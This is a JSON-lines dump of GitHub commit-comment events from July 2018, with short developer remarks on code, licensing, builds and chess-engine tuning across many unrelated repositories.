{"id":"8032320895","type":"CommitCommentEvent","actor":{"login":"ldcpaul"},"repo":{"name":"ldcpaul/React3-1"},"payload":{"comment":{"id":29868617,"position":null,"line":null,"path":null,"commit_id":"c2c7310dda40aecaa59bdbf764a561c7f5a786bb","created_at":"2018-07-28T14:04:24Z","updated_at":"2018-07-28T14:04:24Z","author_association":"OWNER","body":"V N BM"}},"created_at":"2018-07-28T14:04:24Z"}
{"id":"8032321753","type":"CommitCommentEvent","actor":{"login":"codingbunnys"},"repo":{"name":"LinuxCrafts/Custom-Protocol-handler-creator"},"payload":{"comment":{"id":29868619,"position":5,"line":11,"path":"ProtocolCreator.sh","commit_id":"a05a19b6a013a333c25190149058bbb11458e1d5","created_at":"2018-07-28T14:05:00Z","updated_at":"2018-07-28T14:05:00Z","author_association":"COLLABORATOR","body":"its not **copyrighted** its **copylefted**"}},"created_at":"2018-07-28T14:05:00Z"}
{"id":"8032322010","type":"CommitCommentEvent","actor":{"login":"Rhoulhac"},"repo":{"name":"Rhoulhac/Django-budget-software"},"payload":{"comment":{"id":29868620,"position":null,"line":null,"path":null,"commit_id":"d89f13a3e86062d80d21e5b3270ec9ca2c35f680","created_at":"2018-07-28T14:05:11Z","updated_at":"2018-07-28T14:05:11Z","author_association":"OWNER","body":"closes #15 "}},"created_at":"2018-07-28T14:05:11Z"}
{"id":"8032322222","type":"CommitCommentEvent","actor":{"login":"buenoudg"},"repo":{"name":"buenoudg/Ajudant-UdGMoodle"},"payload":{"comment":{"id":29868621,"position":null,"line":null,"path":null,"commit_id":"13cadfd0df1633ff4479fa2cffd815bf63b2ba56","created_at":"2018-07-28T14:05:20Z","updated_at":"2018-07-28T14:05:20Z","author_association":"OWNER","body":"Resol https://github.com/buenoudg/Ajudant-UdGMoodle/issues/1"}},"created_at":"2018-07-28T14:05:20Z"}
{"id":"8032322320","type":"CommitCommentEvent","actor":{"login":"Munter"},"repo":{"name":"webpack/webpack.js.org"},"payload":{"comment":{"id":29868622,"position":22,"line":10,"path":".travis.yml","commit_id":"03e0dcffa2a9b9763d9a28383752b367e6f201cd","created_at":"2018-07-28T14:05:24Z","updated_at":"2018-07-28T14:05:24Z","author_association":"COLLABORATOR","body":"Yeah. I'm considering rewriting the fetch script to store everything in `./fetch-cache` and have a separate task copy things from there to `/src`. That, or completely eliminate the API lookup and go to manual curation of plugins, loaders etc"}},"created_at":"2018-07-28T14:05:24Z"}
{"id":"8032322741","type":"CommitCommentEvent","actor":{"login":"codingbunnys"},"repo":{"name":"LinuxCrafts/Custom-Protocol-handler-creator"},"payload":{"comment":{"id":29868623,"position":4,"line":11,"path":"ProtocolCreator.sh","commit_id":"a05a19b6a013a333c25190149058bbb11458e1d5","created_at":"2018-07-28T14:05:42Z","updated_at":"2018-07-28T14:05:42Z","author_association":"COLLABORATOR","body":"no copyright just copyleft"}},"created_at":"2018-07-28T14:05:42Z"}
{"id":"8032323109","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"php-coder/mystamps"},"payload":{"comment":{"id":29868631,"position":null,"line":null,"path":null,"commit_id":"d779f9304dbd1c00fe52dbf589a126b7652cdeda","created_at":"2018-07-28T14:05:57Z","updated_at":"2018-07-28T14:05:57Z","author_association":"COLLABORATOR","body":"Puzzle `493-632130de` discovered in   [`src/main/config/findbugs-filter.xml`](  https://github.com/php-coder/mystamps/blob/master/src/main/config/findbugs-filter.xml)   and submitted as #933. Please, remember that the puzzle was not   necessarily added in this particular commit. Maybe it was added earlier, but   we discovered it only now."}},"created_at":"2018-07-28T14:05:57Z"}
{"id":"8032323350","type":"CommitCommentEvent","actor":{"login":"nicolodavis"},"repo":{"name":"google/boardgame.io"},"payload":{"comment":{"id":29868632,"position":null,"line":null,"path":null,"commit_id":"c4a11a79292700cf9d6afde737cabd0089941b8d","created_at":"2018-07-28T14:06:04Z","updated_at":"2018-07-28T14:06:04Z","author_association":"COLLABORATOR","body":"#154 "}},"created_at":"2018-07-28T14:06:04Z"}
{"id":"8032324038","type":"CommitCommentEvent","actor":{"login":"Readock"},"repo":{"name":"BrotBerserker/InflectionPoint"},"payload":{"comment":{"id":29868634,"position":null,"line":null,"path":null,"commit_id":"0640aeb385618a238c4878256566983aee1c6d3a","created_at":"2018-07-28T14:06:27Z","updated_at":"2018-07-28T14:06:27Z","author_association":"COLLABORATOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [warum wird in tutorial angezeigt](https://trello.com/c/BhAMTbXq/168-warum-wird-in-tutorial-angezeigt)"}},"created_at":"2018-07-28T14:06:27Z"}
{"id":"8032326539","type":"CommitCommentEvent","actor":{"login":"chehanr"},"repo":{"name":"chehanr/tutreq"},"payload":{"comment":{"id":29868642,"position":null,"line":null,"path":null,"commit_id":"d02a109d6aab15bb3fa39619f4e8af94619b82d9","created_at":"2018-07-28T14:07:41Z","updated_at":"2018-07-28T14:07:41Z","author_association":"OWNER","body":"This works now [thanks to this fix.](https://stackoverflow.com/a/44232692)"}},"created_at":"2018-07-28T14:07:41Z"}
{"id":"8032331482","type":"CommitCommentEvent","actor":{"login":"breandan"},"repo":{"name":"JetBrains/intellij-community"},"payload":{"comment":{"id":29868648,"position":27,"line":73,"path":"plugins/yaml/resources/META-INF/plugin.xml","commit_id":"79870f860767a55becee0f72ae358f9a5d7dd672","created_at":"2018-07-28T14:10:49Z","updated_at":"2018-07-28T14:10:49Z","author_association":"NONE","body":"What is the difference between `Schema.Enabler` and [`jsonSchemaEnabler`](https://github.com/JetBrains/intellij-community/blob/7f210e06698648d43bda9b674b9b8a6d6af96461/plugins/yaml/resources/META-INF/plugin.xml#L82)?"}},"created_at":"2018-07-28T14:10:49Z"}
{"id":"8032339940","type":"CommitCommentEvent","actor":{"login":"locutus2"},"repo":{"name":"goodkov/Stockfish"},"payload":{"comment":{"id":29868674,"position":null,"line":null,"path":null,"commit_id":"eeb25d52a19c032850aa325ae665b8e05919624e","created_at":"2018-07-28T14:16:19Z","updated_at":"2018-07-28T14:16:19Z","author_association":"NONE","body":"Please look in the future more carefully at your test settings. You tune with higher TC 20+0.2 so you use double bandwidth as in contrast to a standard STC test. so i halfed throughput for the tuning.\r\n\r\nRemark:\r\nIf you have used the option nodestime=600 (like described in the testing guide lines https://github.com/glinscott/fishtest/wiki/Creating-my-first-test) in addition it would be ok because this option halfs by design the effective TC. so a setting of 20+0.2 equals in real 10+0.1"}},"created_at":"2018-07-28T14:16:19Z"}
{"id":"8032340133","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"zold-io/java-api"},"payload":{"comment":{"id":29868675,"position":null,"line":null,"path":null,"commit_id":"96c8b938cdd9fa857b9daf9e9b1c6771b1f9e516","created_at":"2018-07-28T14:16:26Z","updated_at":"2018-07-28T14:16:26Z","author_association":"COLLABORATOR","body":"Puzzle `15-1e017e66` disappeared from [`src/main/java/io/zold/api/RtTransaction.java`](https://github.com/zold-io/java-api/blob/master/src/main/java/io/zold/api/RtTransaction.java), that's why I closed #23. Please, remember that the puzzle was not necessarily removed in this particular commit. Maybe it happened earlier, but we discovered this fact only now."}},"created_at":"2018-07-28T14:16:26Z"}
{"id":"8032341742","type":"CommitCommentEvent","actor":{"login":"ikleinman"},"repo":{"name":"ikleinman/myPracticeRepo"},"payload":{"comment":{"id":29868681,"position":null,"line":null,"path":null,"commit_id":"7ea55cf167a6ebc5d63ab2af4a56c6095ef898a3","created_at":"2018-07-28T14:17:33Z","updated_at":"2018-07-28T14:17:33Z","author_association":"OWNER","body":"This is where I practice!"}},"created_at":"2018-07-28T14:17:33Z"}
{"id":"8032343997","type":"CommitCommentEvent","actor":{"login":"NewGen66"},"repo":{"name":"kkapsner/CanvasBlocker"},"payload":{"comment":{"id":29868688,"position":null,"line":null,"path":null,"commit_id":"7f1fe0ed1c3908892678d0a3f1f4b3c1c73374e6","created_at":"2018-07-28T14:19:08Z","updated_at":"2018-07-28T14:19:08Z","author_association":"NONE","body":"Hi I am not sure how to notify you using PM\r\nbut i donated some 6.21\r\nI know its very small\r\ntxn Sent\r\nJuly 28 @ 10:14 AM\r\n\r\n159Y9BLcfHyrp6wj6f3syEuk92xkRVTiie\r\n"}},"created_at":"2018-07-28T14:19:08Z"}
{"id":"8032345150","type":"CommitCommentEvent","actor":{"login":"chmi3ll"},"repo":{"name":"chmi3ll/agata-chmielewska-project"},"payload":{"comment":{"id":29868689,"position":17,"line":17,"path":"src/test/java/com/crud/tasks/mapper/TaskMapperTestSuite.java","commit_id":"550c62d84538cca5e9271fe8100287fc77796bd7","created_at":"2018-07-28T14:19:52Z","updated_at":"2018-07-28T14:19:52Z","author_association":"OWNER","body":"ze zwyklym Mockiem mam NullPointerException XD"}},"created_at":"2018-07-28T14:19:52Z"}
{"id":"8032345679","type":"CommitCommentEvent","actor":{"login":"sishuchao"},"repo":{"name":"sishuchao/789"},"payload":{"comment":{"id":29868690,"position":160,"line":160,"path":"LICENSE","commit_id":"dc3c62340895f30655421a2961e3be7195a9d22f","created_at":"2018-07-28T14:20:12Z","updated_at":"2018-07-28T14:20:12Z","author_association":"OWNER","body":"632131"}},"created_at":"2018-07-28T14:20:12Z"}
{"id":"8032361385","type":"CommitCommentEvent","actor":{"login":"DDroid"},"repo":{"name":"qconrad/intellistar-emulator"},"payload":{"comment":{"id":29868728,"position":null,"line":null,"path":null,"commit_id":"eb43c77aba4ad685706c560b5b777e20ac64b949","created_at":"2018-07-28T14:30:50Z","updated_at":"2018-07-28T14:30:50Z","author_association":"CONTRIBUTOR","body":"The language and units setting was quite useful (to me anyways), maybe in the future it could be added back as an \"Advanced Settings/Expert Settings\" hidable drop-down menu, or even an \"enable hidden settings\" in script, so once enabled many more options are shown on the inital menu? (So that power users, such as I may still use them, but basic users may not have to see them if they don't want to.)"}},"created_at":"2018-07-28T14:30:50Z"}
{"id":"8032362224","type":"CommitCommentEvent","actor":{"login":"jjongyeonglee"},"repo":{"name":"gangnamjava/java-example"},"payload":{"comment":{"id":29868729,"position":null,"line":null,"path":null,"commit_id":"73d8a20d74d145ddeb675b4f78a026e97bc4888e","created_at":"2018-07-28T14:31:24Z","updated_at":"2018-07-28T14:31:24Z","author_association":"CONTRIBUTOR","body":"class 파일이 아닌 .java 파일만 넣어주세요\r\nclass 파일을 git에서 제외시킬때는 \".gitignore\" 것을 한번 읽어보세요\r\n"}},"created_at":"2018-07-28T14:31:24Z"}
{"id":"8032363648","type":"CommitCommentEvent","actor":{"login":"montogeek"},"repo":{"name":"webpack/webpack.js.org"},"payload":{"comment":{"id":29868737,"position":22,"line":10,"path":".travis.yml","commit_id":"03e0dcffa2a9b9763d9a28383752b367e6f201cd","created_at":"2018-07-28T14:32:23Z","updated_at":"2018-07-28T14:32:23Z","author_association":"MEMBER","body":"Those files fetch almost 50 files, we can't do that manually"}},"created_at":"2018-07-28T14:32:23Z"}
{"id":"8032364921","type":"CommitCommentEvent","actor":{"login":"edzer"},"repo":{"name":"r-quantities/units"},"payload":{"comment":{"id":29868742,"position":null,"line":null,"path":null,"commit_id":"3c32401e0329a7436cc94871d0fca652bb500292","created_at":"2018-07-28T14:33:07Z","updated_at":"2018-07-28T14:33:07Z","author_association":"MEMBER","body":"I think this branch is ready to be merged."}},"created_at":"2018-07-28T14:33:07Z"}
{"id":"8032365633","type":"CommitCommentEvent","actor":{"login":"darmie"},"repo":{"name":"darmie/linc_yoga"},"payload":{"comment":{"id":29868744,"position":60,"line":38,"path":"facebook/yoga/Style.hx","commit_id":"2b813c9ff9459eb14c85f691d74b8419d13be35a","created_at":"2018-07-28T14:33:39Z","updated_at":"2018-07-28T14:33:39Z","author_association":"OWNER","body":"Thanks for this, I'll fix."}},"created_at":"2018-07-28T14:33:39Z"}
{"id":"8032368241","type":"CommitCommentEvent","actor":{"login":"Vwan"},"repo":{"name":"Vwan/sicp-lamp"},"payload":{"comment":{"id":29868747,"position":21,"line":72,"path":"ch2/2.2HierarchicalDataandtheClosureProperty.md","commit_id":"6d1f9a8e5d23f16cf22fd0f8a74e482db6155d60","created_at":"2018-07-28T14:35:25Z","updated_at":"2018-07-28T14:35:25Z","author_association":"OWNER","body":"@NBR-hugh Not exactly。举个例子，比如我写python的时候，如果要求一个list的元素个数，我会直接用len()函数，不会去管它怎么实现的，因为我觉得我用python写不来(python 源码好像是c语言吧？）；写lisp的时候，看到书中的例子（是reverse一个list），lisp有现成的reverse函数，但是你可以直接用lisp自己实现一个reverse函数，用的递归思想，很简单就实现了；不知道我这么说有没有get到我想说的感觉？ 当然可能我是新手，python高手应该也可以直接用python实现本来可以直接用的函数。但总感觉lisp可能更厉害，好像有看到写lisp解析器的，全程用一个eval实现，很有大道至简的感觉"}},"created_at":"2018-07-28T14:35:25Z"}
{"id":"8032368403","type":"CommitCommentEvent","actor":{"login":"bushuhui"},"repo":{"name":"npu-chenlin/Tasks"},"payload":{"comment":{"id":29868750,"position":7,"line":20,"path":"projects/VideoGPSRecorder/VideoGPSRecorder.py","commit_id":"72fabcd82e559ac4bd529b57635f94969357e5e5","created_at":"2018-07-28T14:35:32Z","updated_at":"2018-07-28T14:35:32Z","author_association":"CONTRIBUTOR","body":"不错，小伙子发现了这个bug"}},"created_at":"2018-07-28T14:35:32Z"}
{"id":"8032370331","type":"CommitCommentEvent","actor":{"login":"VoyagerOne"},"repo":{"name":"goodkov/Stockfish"},"payload":{"comment":{"id":29868752,"position":null,"line":null,"path":null,"commit_id":"2d1ef9cd2030ceae4ae039510bd4d099a01caa55","created_at":"2018-07-28T14:36:49Z","updated_at":"2018-07-28T14:36:49Z","author_association":"NONE","body":"This is equivalent to your other patch."}},"created_at":"2018-07-28T14:36:49Z"}
{"id":"8032372391","type":"CommitCommentEvent","actor":{"login":"Xavier251998"},"repo":{"name":"CuteLunaMoon/Survival-Pixel-Dungeon"},"payload":{"comment":{"id":29868759,"position":null,"line":null,"path":null,"commit_id":"2e84267c00c9782d8179ef4c415692f9ecc60007","created_at":"2018-07-28T14:38:08Z","updated_at":"2018-07-28T14:38:08Z","author_association":"NONE","body":"?"}},"created_at":"2018-07-28T14:38:08Z"}
{"id":"8032378054","type":"CommitCommentEvent","actor":{"login":"abenedetti"},"repo":{"name":"abenedetti/abenedetti.github.io"},"payload":{"comment":{"id":29868770,"position":null,"line":null,"path":null,"commit_id":"6d1ec5dc791b2ffc2c75948197111b49febf1ee2","created_at":"2018-07-28T14:42:14Z","updated_at":"2018-07-28T14:42:14Z","author_association":"OWNER","body":"Delete repo"}},"created_at":"2018-07-28T14:42:14Z"}
{"id":"8032378118","type":"CommitCommentEvent","actor":{"login":"Zxilly"},"repo":{"name":"donwa/oneindex"},"payload":{"comment":{"id":29868771,"position":null,"line":null,"path":null,"commit_id":"f8d940bec74516141728c26fccbc220cd67d360c","created_at":"2018-07-28T14:42:17Z","updated_at":"2018-07-28T14:42:17Z","author_association":"NONE","body":"这个ocation是location吧。。。没看到那个'l'"}},"created_at":"2018-07-28T14:42:17Z"}
{"id":"8032379744","type":"CommitCommentEvent","actor":{"login":"hichard"},"repo":{"name":"RT-Thread/rt-thread"},"payload":{"comment":{"id":29868779,"position":null,"line":null,"path":null,"commit_id":"ca09b039bcb9d133af04185351574a3792cfdf7a","created_at":"2018-07-28T14:43:27Z","updated_at":"2018-07-28T14:43:27Z","author_association":"CONTRIBUTOR","body":" Add rt_hw_cpu_reset, use cortex-m software reset.  This is a weak function."}},"created_at":"2018-07-28T14:43:27Z"}
{"id":"8032379901","type":"CommitCommentEvent","actor":{"login":"moham96"},"repo":{"name":"PLi-metas/amlogic-e2-procfs"},"payload":{"comment":{"id":29868780,"position":null,"line":null,"path":null,"commit_id":"2b2c5f126cc0f24967616a616eb6c1edb5be89da","created_at":"2018-07-28T14:43:34Z","updated_at":"2018-07-28T14:43:34Z","author_association":"MEMBER","body":"@persianpros Yes if I change the boxtype the remote appears, although the position of the arrows are wrong, anyway I want to leave boxtype as wetek for now."}},"created_at":"2018-07-28T14:43:34Z"}
{"id":"8032380135","type":"CommitCommentEvent","actor":{"login":"PascalSchumacher"},"repo":{"name":"apache/jmeter"},"payload":{"comment":{"id":29868781,"position":null,"line":null,"path":null,"commit_id":"ec9666f63b6edc890f32adf3542ac2212182c6b8","created_at":"2018-07-28T14:43:44Z","updated_at":"2018-07-28T14:43:44Z","author_association":"NONE","body":"By the way: You can use empty commit to close pull requests, e.g. `git commit --allow-empty -m \"close #393\"`"}},"created_at":"2018-07-28T14:43:44Z"}
{"id":"8032381279","type":"CommitCommentEvent","actor":{"login":"yanggis"},"repo":{"name":"yanggis/ChinaTunnel"},"payload":{"comment":{"id":29868782,"position":null,"line":null,"path":null,"commit_id":"0ae948a18c62e2d9a9a23d2fcf4d4c3399de66b1","created_at":"2018-07-28T14:44:32Z","updated_at":"2018-07-28T14:44:32Z","author_association":"OWNER","body":"重启一下你的设备，然后再启动chinatunnel."}},"created_at":"2018-07-28T14:44:32Z"}
{"id":"8032382353","type":"CommitCommentEvent","actor":{"login":"pmouawad"},"repo":{"name":"apache/jmeter"},"payload":{"comment":{"id":29868787,"position":null,"line":null,"path":null,"commit_id":"ec9666f63b6edc890f32adf3542ac2212182c6b8","created_at":"2018-07-28T14:45:15Z","updated_at":"2018-07-28T14:45:15Z","author_association":"CONTRIBUTOR","body":"@PascalSchumacher , thank you.\r\nBut does it work for an Apache Mirror ?"}},"created_at":"2018-07-28T14:45:15Z"}
{"id":"8032382515","type":"CommitCommentEvent","actor":{"login":"goelin66"},"repo":{"name":"goelin66/Nospeek"},"payload":{"comment":{"id":29868790,"position":null,"line":null,"path":null,"commit_id":"74b9e39e39657a9efdea6988a541ee23b59fcc82","created_at":"2018-07-28T14:45:22Z","updated_at":"2018-07-28T14:45:22Z","author_association":"OWNER","body":"For [Python]Install-LXML"}},"created_at":"2018-07-28T14:45:22Z"}
{"id":"8032382925","type":"CommitCommentEvent","actor":{"login":"Adimote"},"repo":{"name":"sourcebots/simulator"},"payload":{"comment":{"id":29868791,"position":14,"line":8,"path":"sb/robot/vision.py","commit_id":"df207e06ee5baad65b5abb7139c79dbe616407b6","created_at":"2018-07-28T14:45:42Z","updated_at":"2018-07-28T14:45:42Z","author_association":"MEMBER","body":"fixed in 5e6db06e19a030ece8e6a008b51341dfc2956980 (better late than never)"}},"created_at":"2018-07-28T14:45:42Z"}
{"id":"8032383656","type":"CommitCommentEvent","actor":{"login":"Adimote"},"repo":{"name":"sourcebots/simulator"},"payload":{"comment":{"id":29868794,"position":14,"line":8,"path":"sb/robot/vision.py","commit_id":"df207e06ee5baad65b5abb7139c79dbe616407b6","created_at":"2018-07-28T14:46:12Z","updated_at":"2018-07-28T14:46:12Z","author_association":"MEMBER","body":"fixed in 5e6db06e19a030ece8e6a008b51341dfc2956980 (better late than never)"}},"created_at":"2018-07-28T14:46:12Z"}
{"id":"8032385610","type":"CommitCommentEvent","actor":{"login":"locutus2"},"repo":{"name":"goodkov/Stockfish"},"payload":{"comment":{"id":29868801,"position":null,"line":null,"path":null,"commit_id":"80f38b918600a56bcc11baf73f66a027dae8aa6a","created_at":"2018-07-28T14:47:40Z","updated_at":"2018-07-28T14:47:40Z","author_association":"NONE","body":"What is now see (I have to be completly blind :-)) that even for depth=0 the stat bonus is negative. So as minimum depth=ONE_PLY shoudl be used.\r\n`std::max(depth - 2 * ONE_PLY, ONE_PLY).`\r\n\r\nor use following stat bonus function:\r\n```\r\n// History and stats update bonus, based on depth\r\n  int stat_bonus(Depth depth) {\r\n    int d = depth / ONE_PLY;\r\n    return d > 17 || d <= 0 ? 0 : 33 * d * d + 66 * d - 66;\r\n  }\r\n```"}},"created_at":"2018-07-28T14:47:40Z"}
{"id":"8032385924","type":"CommitCommentEvent","actor":{"login":"goodkov"},"repo":{"name":"goodkov/Stockfish"},"payload":{"comment":{"id":29868807,"position":null,"line":null,"path":null,"commit_id":"2d1ef9cd2030ceae4ae039510bd4d099a01caa55","created_at":"2018-07-28T14:47:55Z","updated_at":"2018-07-28T14:47:55Z","author_association":"OWNER","body":"Excuse me."}},"created_at":"2018-07-28T14:47:55Z"}
{"id":"8032386280","type":"CommitCommentEvent","actor":{"login":"PascalSchumacher"},"repo":{"name":"apache/jmeter"},"payload":{"comment":{"id":29868808,"position":null,"line":null,"path":null,"commit_id":"ec9666f63b6edc890f32adf3542ac2212182c6b8","created_at":"2018-07-28T14:48:09Z","updated_at":"2018-07-28T14:48:09Z","author_association":"NONE","body":"Yes,  I have seen other Apache Projects close pull requests this way."}},"created_at":"2018-07-28T14:48:09Z"}
{"id":"8032387675","type":"CommitCommentEvent","actor":{"login":"locutus2"},"repo":{"name":"goodkov/Stockfish"},"payload":{"comment":{"id":29868813,"position":null,"line":null,"path":null,"commit_id":"80f38b918600a56bcc11baf73f66a027dae8aa6a","created_at":"2018-07-28T14:49:09Z","updated_at":"2018-07-28T14:49:09Z","author_association":"NONE","body":"Or check that the stat bonus >= 0:\r\n`std:.max(0, stat_bonus(depth - 2 * ONE_PLY))`"}},"created_at":"2018-07-28T14:49:09Z"}
{"id":"8032389837","type":"CommitCommentEvent","actor":{"login":"locutus2"},"repo":{"name":"goodkov/Stockfish"},"payload":{"comment":{"id":29868815,"position":null,"line":null,"path":null,"commit_id":"80f38b918600a56bcc11baf73f66a027dae8aa6a","created_at":"2018-07-28T14:50:38Z","updated_at":"2018-07-28T14:50:38Z","author_association":"NONE","body":"So already the tries with `stat_bonus(depth - ONE_PLY)` were faulty."}},"created_at":"2018-07-28T14:50:38Z"}
{"id":"8032398122","type":"CommitCommentEvent","actor":{"login":"mew-bot"},"repo":{"name":"MyEtherWallet/MEWconnect-landing-page"},"payload":{"comment":{"id":29868833,"position":null,"line":null,"path":null,"commit_id":"14b099d51fd4b5f3c748344e9f216ca28ccc7e2c","created_at":"2018-07-28T14:56:26Z","updated_at":"2018-07-28T14:56:26Z","author_association":"NONE","body":"Copy of this build can be found at https://mewc.mewbuilds.com/build/14b099d51fd4b5f3c748344e9f216ca28ccc7e2c/index.html"}},"created_at":"2018-07-28T14:56:26Z"}
{"id":"8032398160","type":"CommitCommentEvent","actor":{"login":"repository"},"repo":{"name":"rmadhu84/spring5"},"payload":{"comment":{"id":29868834,"position":null,"line":null,"path":null,"commit_id":"242da4b05fadb07903400c8609ccdb9061a0c23a","created_at":"2018-07-28T14:56:27Z","updated_at":"2018-07-28T14:56:27Z","author_association":"NONE","body":":^)"}},"created_at":"2018-07-28T14:56:27Z"}
{"id":"8032398660","type":"CommitCommentEvent","actor":{"login":"ssyk442"},"repo":{"name":"ssyk442/study_memo"},"payload":{"comment":{"id":29868835,"position":null,"line":null,"path":null,"commit_id":"76fe755ebf56def9255f2b6a8d00d67a665a33f5","created_at":"2018-07-28T14:56:50Z","updated_at":"2018-07-28T14:56:50Z","author_association":"OWNER","body":"誤 readme.txt\r\n正 readme.md"}},"created_at":"2018-07-28T14:56:50Z"}
{"id":"8032399030","type":"CommitCommentEvent","actor":{"login":"Zoehax"},"repo":{"name":"Zoehax/SIT313"},"payload":{"comment":{"id":29868836,"position":null,"line":null,"path":null,"commit_id":"06971e409d9c69278017717f749bdd1b7447d2de","created_at":"2018-07-28T14:57:06Z","updated_at":"2018-07-28T14:57:06Z","author_association":"OWNER","body":"the calendar XAML&cs are for the calendar part.\r\nothers I will comment by numbers.\r\n\r\n"}},"created_at":"2018-07-28T14:57:06Z"}
{"id":"8032400653","type":"CommitCommentEvent","actor":{"login":"malexandreb"},"repo":{"name":"malexandreb/tonneau"},"payload":{"comment":{"id":29868852,"position":31,"line":74,"path":"Tonneau.ino","commit_id":"53df20b3024d7e4d783e4e60b4333b19d4f54980","created_at":"2018-07-28T14:58:15Z","updated_at":"2018-07-28T14:58:15Z","author_association":"OWNER","body":"unsigned?"}},"created_at":"2018-07-28T14:58:15Z"}
{"id":"8032402600","type":"CommitCommentEvent","actor":{"login":"WangNianyi2001"},"repo":{"name":"WangNianyi2001/Nianyi-s-JavaScript-Library"},"payload":{"comment":{"id":29868864,"position":160,"line":133,"path":"Nianyi.js","commit_id":"f6d68093b80c025bddfdde3b7251a29928ce737a","created_at":"2018-07-28T14:59:41Z","updated_at":"2018-07-28T14:59:41Z","author_association":"OWNER","body":"This function is written to cache the fixed expensive computed results inside the object."}},"created_at":"2018-07-28T14:59:41Z"}
{"id":"8032402869","type":"CommitCommentEvent","actor":{"login":"ruudvetter"},"repo":{"name":"lamplc/backlash-compensation-grbl-feature"},"payload":{"comment":{"id":29868865,"position":null,"line":null,"path":null,"commit_id":"751f1841ab8ec8298ef038f0b2ce2bcf248362b2","created_at":"2018-07-28T14:59:54Z","updated_at":"2018-07-28T14:59:54Z","author_association":"NONE","body":"How can I put the backslash compensation in BCNC program ?"}},"created_at":"2018-07-28T14:59:54Z"}
{"id":"8032403254","type":"CommitCommentEvent","actor":{"login":"WangNianyi2001"},"repo":{"name":"WangNianyi2001/Nianyi-s-JavaScript-Library"},"payload":{"comment":{"id":29868869,"position":null,"line":null,"path":null,"commit_id":"f6d68093b80c025bddfdde3b7251a29928ce737a","created_at":"2018-07-28T15:00:09Z","updated_at":"2018-07-28T15:00:09Z","author_association":"OWNER","body":"The previous naming of the functions are so redundant!"}},"created_at":"2018-07-28T15:00:09Z"}
{"id":"8032403743","type":"CommitCommentEvent","actor":{"login":"Linus045"},"repo":{"name":"Linus045/e2_vgui_core"},"payload":{"comment":{"id":29868876,"position":14,"line":123,"path":"lua/entities/gmod_wire_expression2/core/custom/vgui_elements/client/dbutton.lua","commit_id":"399b55e368284e95a8449e3b08c2281ee2c6f6cc","created_at":"2018-07-28T15:00:22Z","updated_at":"2018-07-28T15:00:22Z","author_association":"OWNER","body":"change this back to //"}},"created_at":"2018-07-28T15:00:22Z"}
{"id":"8032404044","type":"CommitCommentEvent","actor":{"login":"WangNianyi2001"},"repo":{"name":"WangNianyi2001/Nianyi-s-JavaScript-Library"},"payload":{"comment":{"id":29868878,"position":61,"line":241,"path":"Nianyi.js","commit_id":"d868912c2f4e9c3d4c90483805c4fc457053785a","created_at":"2018-07-28T15:00:33Z","updated_at":"2018-07-28T15:00:33Z","author_association":"OWNER","body":"These shouldn't be exposed."}},"created_at":"2018-07-28T15:00:33Z"}
{"id":"8032404316","type":"CommitCommentEvent","actor":{"login":"Linus045"},"repo":{"name":"Linus045/e2_vgui_core"},"payload":{"comment":{"id":29868879,"position":5,"line":85,"path":"lua/entities/gmod_wire_expression2/core/custom/vgui_elements/client/dframe.lua","commit_id":"399b55e368284e95a8449e3b08c2281ee2c6f6cc","created_at":"2018-07-28T15:00:42Z","updated_at":"2018-07-28T15:00:42Z","author_association":"OWNER","body":"change this back to //"}},"created_at":"2018-07-28T15:00:42Z"}
{"id":"8032404632","type":"CommitCommentEvent","actor":{"login":"Linus045"},"repo":{"name":"Linus045/e2_vgui_core"},"payload":{"comment":{"id":29868882,"position":14,"line":61,"path":"lua/entities/gmod_wire_expression2/core/custom/vgui_elements/client/dpropertysheet.lua","commit_id":"399b55e368284e95a8449e3b08c2281ee2c6f6cc","created_at":"2018-07-28T15:00:55Z","updated_at":"2018-07-28T15:00:55Z","author_association":"OWNER","body":"change this back to //"}},"created_at":"2018-07-28T15:00:55Z"}
{"id":"8032405223","type":"CommitCommentEvent","actor":{"login":"WangNianyi2001"},"repo":{"name":"WangNianyi2001/Nianyi-s-JavaScript-Library"},"payload":{"comment":{"id":29868883,"position":5,"line":5,"path":"Nianyi.js","commit_id":"ed04479661e1c1d65ea90cf3ddd7066d154e23a2","created_at":"2018-07-28T15:01:20Z","updated_at":"2018-07-28T15:01:20Z","author_association":"OWNER","body":"The library."}},"created_at":"2018-07-28T15:01:20Z"}
{"id":"8032405498","type":"CommitCommentEvent","actor":{"login":"WangNianyi2001"},"repo":{"name":"WangNianyi2001/Nianyi-s-JavaScript-Library"},"payload":{"comment":{"id":29868885,"position":11,"line":11,"path":"index.html","commit_id":"ed04479661e1c1d65ea90cf3ddd7066d154e23a2","created_at":"2018-07-28T15:01:31Z","updated_at":"2018-07-28T15:01:31Z","author_association":"OWNER","body":"The playground."}},"created_at":"2018-07-28T15:01:31Z"}
{"id":"8032405875","type":"CommitCommentEvent","actor":{"login":"chenjieru140307"},"repo":{"name":"LiuXingMing/SinaSpider"},"payload":{"comment":{"id":29868886,"position":null,"line":null,"path":null,"commit_id":"ea1be432e0e7aa2aca0c02e1c59126914d42845a","created_at":"2018-07-28T15:01:49Z","updated_at":"2018-07-28T15:01:49Z","author_association":"NONE","body":"666"}},"created_at":"2018-07-28T15:01:49Z"}
{"id":"8032406385","type":"CommitCommentEvent","actor":{"login":"WangNianyi2001"},"repo":{"name":"WangNianyi2001/Nianyi-s-JavaScript-Library"},"payload":{"comment":{"id":29868888,"position":5,"line":5,"path":"index.js","commit_id":"ed04479661e1c1d65ea90cf3ddd7066d154e23a2","created_at":"2018-07-28T15:02:11Z","updated_at":"2018-07-28T15:02:11Z","author_association":"OWNER","body":"The scripts running on the playground."}},"created_at":"2018-07-28T15:02:11Z"}
{"id":"8032408546","type":"CommitCommentEvent","actor":{"login":"MatthewKush"},"repo":{"name":"xrOxygen/xray-oxygen"},"payload":{"comment":{"id":29868901,"position":null,"line":null,"path":null,"commit_id":"aa7143a10385bc20ec74f137c37c57c60f114de4","created_at":"2018-07-28T15:03:44Z","updated_at":"2018-07-28T15:03:44Z","author_association":"NONE","body":"@ForserX I recommend rolling back the DX10HW changes except for the feature levels and double buffering. I hadn't made a pull request yet because it's not ready; in it's current state not many people will be able to run it."}},"created_at":"2018-07-28T15:03:44Z"}
